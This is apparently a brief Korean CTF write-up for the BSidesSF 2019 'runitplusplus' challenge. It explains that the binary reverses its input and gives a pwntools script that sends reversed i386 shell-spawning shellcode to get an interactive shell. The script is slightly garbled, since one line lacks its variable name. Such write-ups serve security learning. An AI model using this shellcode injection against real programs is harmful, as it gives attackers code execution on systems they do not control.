PWN/CTF

[BSidesSF_2019] runitplusplus

J1W0N 2019. 11. 17. 20:43
728x90

뭔가 입력 받고 이런식으로 연산을 한다. 느낌상 걍 뒤집는 느낌.

ABCDEFGH를 입력하고 디버깅 해봤는데

이런식으로 뒤집어서 보내면 끝.

 

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
 
 
= process("./runitplusplus")
elf = ELF("./runitplusplus")
 
 
pay = asm(shellcraft.i386.sh())[::-1]
s.sendafter("stuff!!",pay)
 
 
s.interactive()
cs